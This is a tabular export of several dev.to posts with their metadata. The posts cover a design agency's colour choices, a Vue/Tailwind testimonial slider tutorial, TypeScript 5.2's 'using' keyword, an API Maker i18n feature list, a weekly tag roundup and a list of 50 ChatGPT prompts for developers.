id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,508,799 | Website design among different industries | At our Design Agency Design Agentur Form und Zeichen in Graz, we specialize in creating beautiful... | 0 | 2023-06-18T22:34:25 | https://dev.to/christofkarisch/website-design-among-different-industries-5eoi | design, webdev | At our Design Agency [Design Agentur Form und Zeichen in Graz](https://www.formundzeichen.at/), we specialize in creating beautiful websites that are tailored to each industry. In this article, we will showcase some of our client's websites, highlighting the design concepts behind them. Join us as we explore the inspirations and ideas that brought these designs to life.
## Enduring metal
To convey a sense of durability, stability, and trust for our client [California Metals - Sustainable Metals](https://www.californiametals.com/), we aimed to create a visual impression that aligned with these values. While traditional metallic colors such as gray (steel), yellow (gold), red (copper), and blue (zinc, osmium) were considered, none of them seemed quite fitting. However, given our customer's commitment to supplying sustainable metals, we made a bold choice to incorporate a green metallic look. This distinctive color choice not only sets our client apart, but also emphasizes their unique company philosophy. Through this carefully crafted visual element, we aim to leave a lasting impression that resonates with their target audience.
## Colorful statements
When working with our esteemed client [Aktiver Tierschutz Austria](https://die-tierretter.at/), we had a distinct vision in mind. Our goal was to draw attention to their noble mission of aiding animals while evoking positive emotions through visually appealing marketing materials. To achieve this, we opted for a vibrant and modern design approach. The use of multiple colors became instrumental, with a particular emphasis on light and friendly tones such as yellow, light blue, and rosy hues. This intentional color palette aims to captivate viewers' attention, inviting them to appreciate the playful and engaging aspects of the design.
## Conclusion
The selection of colors for your design plays a pivotal role. Colors establish the foundation for how a design communicates with people, how it visually presents itself, and the emotions it evokes. It is essential to invest time in discovering the perfect color palette, as doing so can elevate your designs to new heights. By carefully considering and choosing the right colors, you can enhance the overall impact and effectiveness of your designs, ensuring they resonate with your target audience on a deeper level. Remember, the power of colors can take your designs to the next level and make a lasting impression.
| christofkarisch |
1,509,169 | Weekly Roundup 009 (Jun 12) - 🔥Hot Topics🔥 in workplace, sharepoint, and powerplatform | Hey fellow developers! It's @jaloplo, here to give you the latest scoop on what's been happening in... | 22,696 | 2023-06-19T07:49:36 | https://dev.to/jaloplo/weekly-roundup-jun-12-hot-topics-in-workplace-sharepoint-and-powerplatform-4d1d | roundup, workplace, sharepoint, powerplatform | Hey fellow developers! It's @jaloplo, here to give you the latest scoop on what's been happening in the [#workplace](https://dev.to/t/workplace), [#sharepoint](https://dev.to/t/sharepoint), and [#powerplatform](https://dev.to/t/powerplatform) communities. 😎
## [#workplace](https://dev.to/t/workplace)
- [Promising Future of Freelancing: Embracing Independence in the Digital Age](https://dev.to/bhavin9920/promising-future-of-freelancing-embracing-independence-in-the-digital-age-30e6) by [Bhavin Moradiya](https://dev.to/bhavin9920)
## [#powerplatform ](https://dev.to/t/powerplatform)
- [From Novice to Ninja: Fueling Enterprise Skillset with low-Code](https://dev.to/balagmadhu/from-novice-to-ninja-fueling-enterprise-skillset-with-low-code-40jm) by [Bala Madhusoodhanan](https://dev.to/balagmadhu)
- [The LowCode Playbook](https://dev.to/wyattdave/the-lowcode-playbook-3897) by [david wyatt](https://dev.to/wyattdave)
- [Share Power Apps without Security Groups](https://dev.to/wyattdave/share-power-apps-without-security-groups-210) by [david wyatt](https://dev.to/wyattdave)
- [What is the PL-100 Exam? All You Need to Know](https://dev.to/citizendevacad/what-is-the-pl-100-exam-all-you-need-to-know-1im6) by [Citizen Development Academy](https://dev.to/citizendevacad)
That's all for this week's roundup! Thanks for tuning in, and remember to keep the discussions lively and informative in our tags. 💬 If you have any suggestions for future topics, feel free to drop them in the comments below. See you next week! 👋 | jaloplo |
1,510,374 | 🚀 API Maker - i18n Internationalization | ⭐ List of Features ⭐ ✅ Support multiple languages ▸ Internationalization enables you to... | 0 | 2023-10-23T03:31:45 | https://dev.to/apimaker/api-maker-i18n-internationalization-10c0 | ##⭐ List of Features ⭐
✅ Support multiple languages
▸ Internationalization enables you to receive error or response messages in different languages from the API Maker.
✅ x-am-internationalization
▸ To receive a response or error message in a specific language, you have to set the **x-am-internationalization** value in the request header.
✅ Predefined errors list
▸ There are the Predefined errors list. user can map the values against keys. user will receive that error value in their error response.
▸ Error support on
▸ Constant errors
▸ Custom API errors
▸ Third party API errors
✅ Symbols & Special characters
▸ The user can set symbols and special characters, as a response error message.
✅ Quick effect
▸ No need to restart the project, just change the error message, and it will be reflected immediately.
✅ Switch language in sec
▸ Just provide the internationalization name in the header, and you will get an error message in your provided language.
----------------------------------
## Youtube video link
https://youtu.be/HBhubqm-5vw
## Websites
https://apimaker.dev
## API Docs link
https://docs.apimaker.dev/v1/docs/i18/i18.html
## Follow on twitter
https://twitter.com/api_maker
## Linked In
https://www.linkedin.com/company/api-maker | apimaker | |
1,510,409 | How to Build a Fancy Testimonial Slider with Tailwind CSS and Vue | Live Demo / Download -- Welcome to the third and final part of our series on How to Build... | 23,454 | 2023-06-20T09:01:25 | https://cruip.com/how-to-build-a-fancy-testimonial-slider-with-tailwind-css-and-vue/ | tailwindcss, vue, tutorial, webdev | ####**[Live Demo](https://cruip-tutorials-vue.vercel.app/fancy-testimonials-slider) / [Download](https://github.com/cruip/cruip-tutorials-vue/blob/main/src/components/FancyTestimonialsSlider.vue)**
--
Welcome to the third and final part of our series on **How to Build a Fancy Testimonial Slider with Tailwind CSS**! This post will guide you through the development of a **Vue** and **Tailwind CSS**\-based **fancy testimonial slider** featuring comprehensive TypeScript compatibility.
As usual, to get a better idea of how the final outcome will look, check out the live demo or one of our beautiful [Tailwind CSS templates](https://cruip.com/) (e.g., **Stellar**, a [dark landing page template](https://cruip.com/stellar/) based on Next.js).
Let’s get started with the tutorial. You can keep your favorite code editor open while you follow along.
Create the structure for the Vue component
------------------------------------------
To kick things off, let’s create a new file called `FancyTestimonialsSlider.vue` for our component and add the following code:
```ts
<script setup lang="ts">
import { ref } from 'vue'
import TestimonialImg01 from '../assets/testimonial-01.jpg'
import TestimonialImg02 from '../assets/testimonial-02.jpg'
import TestimonialImg03 from '../assets/testimonial-03.jpg'
const active = ref<number>(0)
const autorotate = ref<boolean>(true)
const autorotateTiming = ref<number>(7000)
interface Testimonial {
img: string
quote: string
name: string
role: string
}
const testimonials: Testimonial[] = [
{
img: TestimonialImg01,
quote: "The ability to capture responses is a game-changer. If a user gets tired of the sign up and leaves, that data is still persisted. Additionally, it's great to be able to select between formats.ture responses is a game-changer.",
name: 'Jessie J',
role: 'Ltd Head of Product'
},
{
img: TestimonialImg02,
quote: "I have been using this product for a few weeks now and I am blown away by the results. My skin looks visibly brighter and smoother, and I have received so many compliments on my complexion.",
name: 'Mark Luk',
role: 'Spark Founder & CEO'
},
{
img: TestimonialImg03,
quote: "As a busy professional, I don't have a lot of time to devote to working out. But with this fitness program, I have seen amazing results in just a few short weeks. The workouts are efficient and effective.",
name: 'Jeff Kahl',
role: 'Appy Product Lead'
}
]
</script>
<template>
<div class="w-full max-w-3xl mx-auto text-center">
<!-- ... -->
</div>
</template>
```
Firstly, note that we are using the new syntax `setup` of Vue 3, which allows us to use the Composition API inside the `script` tag without needing to use the `export default` syntax.
Next, we have imported the testimonials’ images and defined the variables `active`, `autorotate`, and `autorotateTiming`, which we have already used in the previous HTML and React components.
To ensure reactivity for these variables, we have used the `ref` functionfrom Vue 3’s Composition API. This allows us to treat the variables as reactive without using the `data` object.
Additionally, we’ve defined the `testimonials` array that contains the properties for each testimonial, including the image, quote, name, and role.
Lastly, since we are adopting TypeScript, we’ve defined the `Testimonial` interface to specify the type of each testimonial property.
Great! Now, let’s move on to constructing the HTML structure of our component within the `template` tag:
```html
<template>
<div class="w-full max-w-3xl mx-auto text-center">
<!-- Testimonial image -->
<div class="relative h-32">
<div class="absolute top-0 left-1/2 -translate-x-1/2 w-[480px] h-[480px] pointer-events-none before:absolute before:inset-0 before:bg-gradient-to-b before:from-indigo-500/25 before:via-indigo-500/5 before:via-25% before:to-indigo-500/0 before:to-75% before:rounded-full before:-z-10">
<div class="h-32 [mask-image:_linear-gradient(0deg,transparent,theme(colors.white)_20%,theme(colors.white))]">
<template :key="index" v-for="(testimonial) in testimonials">
<img class="relative top-11 left-1/2 -translate-x-1/2 rounded-full" :src="testimonial.img" width="56" height="56" :alt="testimonial.name" />
</template>
</div>
</div>
</div>
<!-- Text -->
<div class="mb-9 transition-all duration-150 delay-300 ease-in-out">
<div class="relative flex flex-col">
<template :key="index" v-for="(testimonial) in testimonials">
<div class="text-2xl font-bold text-slate-900 before:content-['\201C'] after:content-['\201D']">{{ testimonial.quote }}</div>
</template>
</div>
</div>
<!-- Buttons -->
<div class="flex flex-wrap justify-center -m-1.5">
<template :key="index" v-for="(testimonial, index) in testimonials">
<button
class="inline-flex justify-center whitespace-nowrap rounded-full px-3 py-1.5 m-1.5 text-xs shadow-sm focus-visible:outline-none focus-visible:ring focus-visible:ring-indigo-300 dark:focus-visible:ring-slate-600 transition-colors duration-150"
:class="active === index ? 'bg-indigo-500 text-white shadow-indigo-950/10' : 'bg-white hover:bg-indigo-100 text-slate-900'"
@click="active = index"
>
<span>{{ testimonial.name }}</span> <span :class="active === index ? 'text-indigo-200' : 'text-slate-300'">-</span> <span>{{ testimonial.role }}</span>
</button>
</template>
</div>
</div>
</template>
```
While in React we emploied the `map()` method to iterate over the `testimonials` array, in Vue 3 we have used a `template` tag with the `v-for` attribute to render each testimonial.
To add dynamic behavior to the buttons, we’ve used the `:class` directive. This allows us to apply different classes to the buttons based on whether they represent the active testimonial or not. The active state is denoted by the classes `bg-indigo-500 text-white shadow-indigo-950/10`, while the inactive state uses the classes `bg-white hover:bg-indigo-100 text-slate-900`.
To handle user interaction, we’ve added an `@click` event to each button, which updates the active testimonial index.
We’re making solid progress, but we still need to show only the active testimonial and define the fancy transitions, which are a visually appealing feature of this component.
Show only the active testimonial and define transitions
-------------------------------------------------------
We will accomplish these two tasks in a single step by using a transition component. We’ll use the [Headless UI](https://headlessui.com/) library instead of Vue 3’s built-in Transition component. If you’ve followed our previous tutorial on creating a video modal component, you might already be familiar with this preference.
Let’s start by installing Headless UI using the command `npm install @headlessui/react@latest`.
Once installed, we can import the `TransitionRoot` component and wrap the image and text of the active testimonial within it:
```html
<script setup lang="ts">
import { ref } from 'vue'
import { TransitionRoot } from '@headlessui/vue'
import TestimonialImg01 from '../assets/testimonial-01.jpg'
import TestimonialImg02 from '../assets/testimonial-02.jpg'
import TestimonialImg03 from '../assets/testimonial-03.jpg'
const active = ref<number>(0)
const autorotate = ref<boolean>(true)
const autorotateTiming = ref<number>(7000)
interface Testimonial {
img: string
quote: string
name: string
role: string
}
const testimonials: Testimonial[] = [
{
img: TestimonialImg01,
quote: "The ability to capture responses is a game-changer. If a user gets tired of the sign up and leaves, that data is still persisted. Additionally, it's great to be able to select between formats.ture responses is a game-changer.",
name: 'Jessie J',
role: 'Ltd Head of Product'
},
{
img: TestimonialImg02,
quote: "I have been using this product for a few weeks now and I am blown away by the results. My skin looks visibly brighter and smoother, and I have received so many compliments on my complexion.",
name: 'Mark Luk',
role: 'Spark Founder & CEO'
},
{
img: TestimonialImg03,
quote: "As a busy professional, I don't have a lot of time to devote to working out. But with this fitness program, I have seen amazing results in just a few short weeks. The workouts are efficient and effective.",
name: 'Jeff Kahl',
role: 'Appy Product Lead'
}
]
</script>
<template>
<div class="w-full max-w-3xl mx-auto text-center">
<!-- Testimonial image -->
<div class="relative h-32">
<div class="absolute top-0 left-1/2 -translate-x-1/2 w-[480px] h-[480px] pointer-events-none before:absolute before:inset-0 before:bg-gradient-to-b before:from-indigo-500/25 before:via-indigo-500/5 before:via-25% before:to-indigo-500/0 before:to-75% before:rounded-full before:-z-10">
<div class="h-32 [mask-image:_linear-gradient(0deg,transparent,theme(colors.white)_20%,theme(colors.white))]">
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
class="absolute inset-0 h-full -z-10"
enter="transition ease-[cubic-bezier(0.68,-0.3,0.32,1)] duration-700 order-first"
enterFrom="opacity-0 -rotate-[60deg]"
enterTo="opacity-100 rotate-0"
leave="transition ease-[cubic-bezier(0.68,-0.3,0.32,1)] duration-700"
leaveFrom="opacity-100 rotate-0"
leaveTo="opacity-0 rotate-[60deg]"
>
<img class="relative top-11 left-1/2 -translate-x-1/2 rounded-full" :src="testimonial.img" width="56" height="56" :alt="testimonial.name" />
</TransitionRoot>
</template>
</div>
</div>
</div>
<!-- Text -->
<div class="mb-9 transition-all duration-150 delay-300 ease-in-out">
<div class="relative flex flex-col" ref="testimonialsRef">
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
enter="transition ease-in-out duration-500 delay-200 order-first"
enterFrom="opacity-0 -translate-x-4"
enterTo="opacity-100 translate-x-0"
leave="transition ease-out duration-300 delay-300 absolute"
leaveFrom="opacity-100 translate-x-0"
leaveTo="opacity-0 translate-x-4"
>
<div class="text-2xl font-bold text-slate-900 before:content-['\201C'] after:content-['\201D']">{{ testimonial.quote }}</div>
</TransitionRoot>
</template>
</div>
</div>
<!-- Buttons -->
<div class="flex flex-wrap justify-center -m-1.5">
<template :key="index" v-for="(testimonial, index) in testimonials">
<button
class="inline-flex justify-center whitespace-nowrap rounded-full px-3 py-1.5 m-1.5 text-xs shadow-sm focus-visible:outline-none focus-visible:ring focus-visible:ring-indigo-300 dark:focus-visible:ring-slate-600 transition-colors duration-150"
:class="active === index ? 'bg-indigo-500 text-white shadow-indigo-950/10' : 'bg-white hover:bg-indigo-100 text-slate-900'"
@click="active = index"
>
<span>{{ testimonial.name }}</span> <span :class="active === index ? 'text-indigo-200' : 'text-slate-300'">-</span> <span>{{ testimonial.role }}</span>
</button>
</template>
</div>
</div>
</template>
```
By using the `:show` directive, we can control which testimonial is currently displayed while hiding the others. We’ve also applied Tailwind CSS classes to define entrance and exit animations.
As a result, when transitioning between testimonials, the text will gracefully fade in from the left, and the image will fade in with a clockwise rotation.
Improving UX during transitions
-------------------------------
Now, let’s make sure to provide an optimal user experience. As we have seen before, if one testimonial has more text than the others, the height of the testimonial will abruptly change during the transition, resulting in a less pleasant effect.
To prevent this from happening, we will add a method called `heightFix()` to our component, which calculates the height of the current testimonial and applies it to the parent element:
```ts
const heightFix = () => {
setTimeout(() => {
if (testimonialsRef.value && testimonialsRef.value.parentElement) testimonialsRef.value.parentElement.style.height = `${testimonialsRef.value.clientHeight}px`
}, 1)
}
```
The `heightFix()` method is fired when the `@before-enter` event emitted by the transition component, just like this:
```ts
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
enter="transition ease-in-out duration-500 delay-200 order-first"
enterFrom="opacity-0 -translate-x-4"
enterTo="opacity-100 translate-x-0"
leave="transition ease-out duration-300 delay-300 absolute"
leaveFrom="opacity-100 translate-x-0"
leaveTo="opacity-0 translate-x-4"
@before-enter="heightFix()"
>
<div class="text-2xl font-bold text-slate-900 before:content-['\201C'] after:content-['\201D']">{{ testimonial.quote }}</div>
</TransitionRoot>
</template>
```
Enabling autorotate functionality on component mount
----------------------------------------------------
Now, let’s add a final touch to our testimonial slider by enabling automatic rotation between testimonials. We want them to automatically rotate ewith a 7-second interval.
To do this, we will use Vue 3’s `onMounted()` hook, which allows us to execute code when the component is mounted:
```tsx
let interval: number
onMounted(() => {
if (!autorotate.value) return
interval = setInterval(() => {
active.value = active.value + 1 === testimonials.length ? 0 : active.value + 1
}, autorotateTiming.value)
})
```
We also need to ensure that the interval is cleared when the component is unmounted. We we will use the `onUnmounted()` hook for that:
```ts
onUnmounted(() => clearInterval(interval))
```
Finally, we want to turn off the automatic rotation when the user interacts with the buttons. We’ll create a method called `stopAutorotate()` for this purpose. This method changes the `autorotate` variable from `true` to `false` and clears the interval:
```ts
const stopAutorotate = () => {
autorotate.value = false
clearInterval(interval)
}
```
To activate this method, we’ll simply call it when a user clicks on one of the buttons:
```ts
@click="active = index; stopAutorotate();"
```
Et voilà! We have created an advanced testimonial component that provides an optimal user experience and visually appealing animations.
But there is still something we can do to improve it. Currently, using the component requires defining the testimonial properties directly within the component itself, limiting its flexibility. That’s why we want to make our component reusable.
Making the testimonial component reusable
-----------------------------------------
Here’s the plan: we’ll transfer the `testimonials` array to the parent component, which in this case is `FancyTestimonialSliderPage.vue`. Then, we will pass the array to the component through the `:testimonials` prop:
```ts
<script setup lang="ts">
import TestimonialImg01 from '../assets/testimonial-01.jpg'
import TestimonialImg02 from '../assets/testimonial-02.jpg'
import TestimonialImg03 from '../assets/testimonial-03.jpg'
import FancyTestimonialsSlider from '../components/FancyTestimonialsSlider.vue'
const testimonials = [
{
img: TestimonialImg01,
quote: "The ability to capture responses is a game-changer. If a user gets tired of the sign up and leaves, that data is still persisted. Additionally, it's great to be able to select between formats.ture responses is a game-changer.",
name: 'Jessie J',
role: 'Ltd Head of Product'
},
{
img: TestimonialImg02,
quote: "I have been using this product for a few weeks now and I am blown away by the results. My skin looks visibly brighter and smoother, and I have received so many compliments on my complexion.",
name: 'Mark Luk',
role: 'Spark Founder & CEO'
},
{
img: TestimonialImg03,
quote: "As a busy professional, I don't have a lot of time to devote to working out. But with this fitness program, I have seen amazing results in just a few short weeks. The workouts are efficient and effective.",
name: 'Jeff Kahl',
role: 'Appy Product Lead'
}
]
</script>
<template>
<FancyTestimonialsSlider :testimonials="testimonials" />
</template>
```
Of course, we will also need to modify the component we have created so that it can receive testimonial data from the outside. To do this, we will use the `defineProps()` function of Vue 3, which allows us to define the props of a component as follows:
```ts
const props = defineProps<{
testimonials: Testimonial[]
}>()
const testimonials = props.testimonials
```
Finally, now that our testimonials are defined in the parent component, we can safely remove the image imports in our testimonial component. We no longer need them since the parent component takes care of that.
And here we have our reusable testimonial component:
```ts
<script setup lang="ts">
import { ref, onMounted, onUnmounted } from 'vue'
import { TransitionRoot } from '@headlessui/vue'
const testimonialsRef = ref<HTMLCanvasElement | null>(null)
const active = ref<number>(0)
const autorotate = ref<boolean>(true)
const autorotateTiming = ref<number>(7000)
let interval: number
interface Testimonial {
img: string
quote: string
name: string
role: string
}
const props = defineProps<{
testimonials: Testimonial[]
}>()
const testimonials = props.testimonials
const heightFix = () => {
setTimeout(() => {
if (testimonialsRef.value && testimonialsRef.value.parentElement) testimonialsRef.value.parentElement.style.height = `${testimonialsRef.value.clientHeight}px`
}, 1)
}
const stopAutorotate = () => {
autorotate.value = false
clearInterval(interval)
}
onMounted(() => {
if (!autorotate.value) return
interval = setInterval(() => {
active.value = active.value + 1 === testimonials.length ? 0 : active.value + 1
}, autorotateTiming.value)
})
onUnmounted(() => clearInterval(interval))
</script>
<template>
<div class="w-full max-w-3xl mx-auto text-center">
<!-- Testimonial image -->
<div class="relative h-32">
<div class="absolute top-0 left-1/2 -translate-x-1/2 w-[480px] h-[480px] pointer-events-none before:absolute before:inset-0 before:bg-gradient-to-b before:from-indigo-500/25 before:via-indigo-500/5 before:via-25% before:to-indigo-500/0 before:to-75% before:rounded-full before:-z-10">
<div class="h-32 [mask-image:_linear-gradient(0deg,transparent,theme(colors.white)_20%,theme(colors.white))]">
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
class="absolute inset-0 h-full -z-10"
enter="transition ease-[cubic-bezier(0.68,-0.3,0.32,1)] duration-700 order-first"
enterFrom="opacity-0 -rotate-[60deg]"
enterTo="opacity-100 rotate-0"
leave="transition ease-[cubic-bezier(0.68,-0.3,0.32,1)] duration-700"
leaveFrom="opacity-100 rotate-0"
leaveTo="opacity-0 rotate-[60deg]"
>
<img class="relative top-11 left-1/2 -translate-x-1/2 rounded-full" :src="testimonial.img" width="56" height="56" :alt="testimonial.name" />
</TransitionRoot>
</template>
</div>
</div>
</div>
<!-- Text -->
<div class="mb-9 transition-all duration-150 delay-300 ease-in-out">
<div class="relative flex flex-col" ref="testimonialsRef">
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
enter="transition ease-in-out duration-500 delay-200 order-first"
enterFrom="opacity-0 -translate-x-4"
enterTo="opacity-100 translate-x-0"
leave="transition ease-out duration-300 delay-300 absolute"
leaveFrom="opacity-100 translate-x-0"
leaveTo="opacity-0 translate-x-4"
@before-enter="heightFix()"
>
<div class="text-2xl font-bold text-slate-900 before:content-['\201C'] after:content-['\201D']">{{ testimonial.quote }}</div>
</TransitionRoot>
</template>
</div>
</div>
<!-- Buttons -->
<div class="flex flex-wrap justify-center -m-1.5">
<template :key="index" v-for="(testimonial, index) in testimonials">
<button
class="inline-flex justify-center whitespace-nowrap rounded-full px-3 py-1.5 m-1.5 text-xs shadow-sm focus-visible:outline-none focus-visible:ring focus-visible:ring-indigo-300 dark:focus-visible:ring-slate-600 transition-colors duration-150"
:class="active === index ? 'bg-indigo-500 text-white shadow-indigo-950/10' : 'bg-white hover:bg-indigo-100 text-slate-900'"
@click="active = index; stopAutorotate();"
>
<span>{{ testimonial.name }}</span> <span :class="active === index ? 'text-indigo-200' : 'text-slate-300'">-</span> <span>{{ testimonial.role }}</span>
</button>
</template>
</div>
</div>
</template>
```
And there you have it! We have reached the end of this tutorial and our mini-series on creating a fancy testimonial slider with Tailwind CSS. If you found this post helpful, don’t miss out on the previous parts covering Alpine.js and Next.js. Additionally, feel free to explore our [Tailwind CSS tutorials](https://cruip.com/tutorials/) section, where we showcase remarkable components and effects that seamlessly complement your projects.
| cruip_com |
1,510,736 | Typescript 5.2 - Using | TypeScript 5.2 is set to introduce a new keyword called 'using', which allows you to dispose of... | 0 | 2023-06-20T12:46:19 | https://dev.to/lingfei1999/typescript-52-using-1o0d | typescript, webdev |
TypeScript 5.2 is set to introduce a new keyword called 'using', which allows you to dispose of resources with a Symbol.dispose function when they go out of scope.
Here's an example of how it works:
```typescript
{
const getResource = () => {
return {
[Symbol.dispose]: () => {
console.log('Hooray!');
}
};
}
using resource = getResource();
} // 'Hooray!' logged to console
```
This feature is based on the TC39 proposal, which has recently reached Stage 3, indicating its upcoming inclusion in JavaScript.
The 'using' keyword will be particularly valuable for managing resources such as file handles, database connections, and more.
Symbol.dispose is a new global symbol in JavaScript. By assigning a function to Symbol.dispose, any object becomes a 'resource' – an object with a specific lifetime – that can be utilized with the 'using' keyword.
Here's an example of using Symbol.dispose:
```typescript
const resource = {
[Symbol.dispose]: () => {
console.log("Hooray!");
},
};
```
Additionally, TypeScript 5.2 will support Symbol.asyncDispose and 'await using' for handling asynchronously disposed resources.
For example:
```typescript
const getResource = () => ({
[Symbol.asyncDispose]: async () => {
await someAsyncFunc();
},
});
{
await using resource = getResource();
}
```
The above code will await the Symbol.asyncDispose function before continuing, making it useful for resources that require asynchronous disposal, such as database connections.
Here are a couple of use cases for the 'using' keyword:
File handles: Accessing the file system with file handles in Node.js becomes easier with 'using'.
Without 'using':
```typescript
import { open } from "node:fs/promises";
let filehandle;
try {
filehandle = await open("thefile.txt", "r");
} finally {
await filehandle?.close();
}
```
With 'using':
```typescript
import { open } from "node:fs/promises";
const getFileHandle = async (path: string) => {
const filehandle = await open(path, "r");
return {
filehandle,
[Symbol.asyncDispose]: async () => {
await filehandle.close();
},
};
};
{
await using file = getFileHandle("thefile.txt");
// Do stuff with file.filehandle
} // Automatically disposed!
```
Database connections: Managing database connections becomes more streamlined with 'using'.
Without 'using':
```typescript
const connection = await getDb();
try {
// Do stuff with connection
} finally {
await connection.close();
}
```
With 'using':
```typescript
const getConnection = async () => {
const connection = await getDb();
return {
connection,
[Symbol.asyncDispose]: async () => {
await connection.close();
},
};
};
{
await using { connection } = getConnection();
// Do stuff with connection
} // Automatically closed!
```
Overall, the 'using' keyword in TypeScript 5.2 simplifies resource management by allowing automatic disposal of resources when they go out of scope, enhancing code clarity and reducing the chances of resource leaks.
https://www.open-consulting.co/writing/engineering/typescript_using | lingfei1999 |
1,510,768 | 50 ChatGPT Prompts for Developers | As you embark on your coding journey armed with these top ChatGPT prompts for developers, remember... | 0 | 2023-06-20T13:33:23 | https://dev.to/mursalfk/50-chatgpt-prompts-for-developers-4bp6 | developer, chatgpt, programming, cheatsheet | As you embark on your coding journey armed with these top ChatGPT prompts for developers, remember that the true magic lies in your creativity and determination. Coding is not just about writing lines of code; it's about solving problems, building solutions, and creating something meaningful. Embrace the challenges, learn from your mistakes, and never stop exploring. 💪💡
Whether you're working on personal projects, collaborating with a team, or contributing to open-source communities, your contributions matter. 👥🌐 The world of programming is full of endless opportunities and exciting possibilities. So, go ahead and dive into the world of programming with confidence. Let these prompts serve as your guide, mentor, and source of inspiration. ChatGPT is here to support you, but the true power to transform ideas into reality lies within you. ✨🚀
Keep coding, keep exploring, and keep pushing the boundaries of what's possible. The world is waiting for the amazing things you'll create. 🌍⚡️ So, grab your favorite editor, unleash your imagination, and let your creativity soar! Happy coding, and may your programming journey be filled with endless possibilities and great achievements! 🎉💻
| S.No.| Task Name | Prompt |
| --- | --- | --- |
| 1. | Code Review | "Please review my code and provide feedback." |
| 2. | Debugging Help | "I'm encountering an error in my code. Can you help me debug it?" |
| 3. | Algorithm Optimization | "How can I optimize this algorithm for better performance?" |
| 4. | Choosing a Programming Language | "Which programming language should I choose for my project?" |
| 5. | Framework Comparison | "What are the differences between Framework A and Framework B?" |
| 6. | Database Design | "Can you provide guidance on designing a database schema for my application?" |
| 7. | API Integration | "How do I integrate API X into my application?" |
| 8. | Version Control | "What's the best way to use Git for version control?" |
| 9. | Security Best Practices | "What are the recommended security practices for web development?" |
| 10. | Code Documentation | "How should I document my code for better readability?" |
| 11. | Performance Optimization | "What techniques can I use to improve the performance of my application?" |
| 12. | Unit Testing | "What is unit testing and how do I write effective unit tests?" |
| 13. | Continuous Integration | "How can I set up continuous integration for my project?" |
| 14. | Deployment Strategies | "What are the different deployment strategies I can use for my application?" |
| 15. | Error Handling | "What are the best practices for handling errors in my code?" |
| 16. | Code Refactoring | "How can I refactor my code to make it more maintainable?" |
| 17. | API Design | "What are the key principles for designing a well-structured API?" |
| 18. | Frontend Development | "What are the latest trends and best practices in frontend development?" |
| 19. | Backend Development | "What are the essential technologies and frameworks for backend development?" |
| 20. | Code Performance Profiling | "How can I profile my code to identify performance bottlenecks?" |
| 21. | Design Patterns | "Can you explain the concept of design patterns and provide examples?" |
| 22. | Code Modularization | "What strategies can I use to modularize my codebase?" |
| 23. | Code Licensing | "What are the different types of software licenses and their implications?" |
| 24. | Code Deployment | "How can I automate the deployment process for my application?" |
| 25. | Scalability | "What are the techniques for building scalable applications?" |
| 26. | Mobile App Development | "What are the recommended frameworks for mobile app development?" |
| 27. | Code Optimization | "How can I optimize my code for better efficiency?" |
| 28. | Designing RESTful APIs | "What are the key principles for designing RESTful APIs?" |
| 29. | Code Organization | "What is a good approach for organizing code files and folders?" |
| 30. | Error Logging | "What is the best way to log errors in a production environment?" |
| 31. | User Authentication | "How can I implement secure user authentication in my application?" |
| 32. | Code Review Etiquette | "What are the best practices for providing constructive code reviews?" |
| 33. | Code Versioning | "How can I effectively manage different versions of my code?" |
| 34. | Database Migration | "What is database migration and how can I perform it safely?" |
| 35. | Code Profiling Tools | "What are some useful tools for profiling code performance?" |
| 36. | Continuous Deployment | "How can I set up continuous deployment for my application?" |
| 37. | Web Scraping | "What are the techniques and tools for web scraping?" |
| 38. | API Authentication | "How can I implement authentication for my API endpoints?" |
| 39. | Secure Coding Practices | "What are the best practices for writing secure code?" |
| 40. | Error Monitoring | "How can I monitor and track errors in my live application?" |
| 41. | Code Review Checklist | "What are the important aspects to consider during a code review?" |
| 42. | Testing Frameworks | "What are some popular testing frameworks for different programming languages?" |
| 43. | Continuous Testing | "How can I automate the testing process for my application?" |
| 44. | REST API Design | "What are the key principles for designing a RESTful API?" |
| 45. | Code Documentation Tools | "What are some useful tools for generating code documentation?" |
| 46. | Code Review Collaboration | "How can I collaborate effectively during a code review process?" |
| 47. | Memory Management | "What are the best practices for managing memory in my code?" |
| 48. | Error Handling Strategies | "What are the different strategies for handling errors in software?" |
| 49. | Data Serialization | "How can I serialize and deserialize data in my application?" |
| 50. | Performance Testing | "What are the techniques and tools for performance testing my application?" |

Writing these many prompts made me say that. But don't worry. Here are also some bonus prompts.
## Bonus Prompts:
1. "How can I improve the performance of my website/app?"
2. "What are the best practices for version control?"
3. "How do I handle user authentication and authorization securely?"
4. "What are some efficient data structures for my specific use case?"
5. "Can you recommend any resources for learning a new programming language?"
6. "What are the common security vulnerabilities in web applications and how can I prevent them?"
7. "How can I implement caching in my application for better performance?"
8. "What are the steps for deploying my application to a production server?"
9. "How can I optimize database queries for faster retrieval?"
10. "What are the principles of clean code and how can I apply them in my projects?"
In conclusion, programming is a thrilling adventure that opens doors to endless innovation and possibilities. 💻✨ By leveraging the power of ChatGPT and these top prompts for developers, you're equipped with a treasure trove of inspiration to fuel your coding endeavors. 🚀🔥 Whether you're a seasoned programmer or just starting, embrace the challenges, learn from each line of code, and let your imagination run wild. The world is your playground, waiting for you to create the next big thing. 🌍💡
So, don your coding cape and embark on this exciting journey! Let your creativity shine through your lines of code, solving problems and shaping the future. Remember, every bug you squash, every algorithm you optimize, and every project you build brings you one step closer to greatness. 🐞🔧
Harness the power of technology, wield the language of programming, and be the architect of innovation. Together, we can push the boundaries of what's possible and create a future where anything is achievable. Happy coding! 🎉💪
Now, go forth and conquer the world of programming! 🌟🌈 May your code be bug-free, your algorithms be efficient, and your passion for programming never fade. The world eagerly awaits the wonders you'll create! 🌎✨⚡️
Happy Coding 👨💻

| mursalfk |
1,511,355 | Excited to start my Coding Journey! | A post by Jesse Navarette | 0 | 2023-06-21T00:44:09 | https://dev.to/jesse_navarette_b4e40b75b/excited-to-start-my-coding-journey-1lh2 | jesse_navarette_b4e40b75b | ||
